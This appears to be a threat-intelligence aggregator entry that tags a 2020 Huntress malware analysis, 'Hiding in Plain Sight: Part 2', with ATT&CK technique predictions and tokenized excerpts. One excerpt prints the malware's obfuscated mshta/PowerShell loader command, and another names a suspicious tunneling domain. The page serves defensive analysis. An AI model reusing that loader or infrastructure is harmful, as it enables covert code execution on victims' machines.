TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Hiding in Plain Sight: Part 2

2020-08-20 · Read original ↗

ATT&CK techniques detected

5 predictions
T1059.001PowerShell
99%
"##32 \ bfeonservice. exe vbscript : createobject ( \ " wscript. shell \ " ). run ( \ " cmd. exe / c c : \ windows \ system32 \ engine. exe - c \ " \ " iex $ ( $ ( gc ' c : \ windows \ a. chk ' | % { [ char ] [ int ] ( $ _. split ( ' x ' ) [ - 1 ] ) } ) - join ' ' ) \ " \ " \ ", 0…"
T1059.001PowerShell
84%
"hiding in plain sight : part 2 we recently uncovered a really peculiar piece of malware, which we ’ ve jokingly referred to as “ the gift that keeps on giving. ” and the more we dug into it, the more we found to uncover and unpack. i consider this a “ multi - stager, multi - payl…"
T1059.001PowerShell
69%
"0, true ) ( window. close ) " the malware seemed to use a certain scheme — the doppelganger for the legitimate mshta. exe application ( described in part one of this blog series ) is always renamed to a real, currently - active service on the target system. the second program tha…"
T1572Protocol Tunneling
65%
"& type = txt do you see that dmarc. jqueryupdatejs. com? anyone who might be familiar with javascript or the jquery library might recognize this language, but even someone without that knowledge might pick up on the fact that jqueryupdatejs. com looks a bit suspicious. this secon…"
T1053.005Scheduled Task
39%
"hiding in plain sight : part 2 we recently uncovered a really peculiar piece of malware, which we ’ ve jokingly referred to as “ the gift that keeps on giving. ” and the more we dug into it, the more we found to uncover and unpack. i consider this a “ multi - stager, multi - payl…"

Summary

As a follow-up to our previous post, we recently uncovered a really peculiar piece of malware that works through a lot of different layers of abstraction.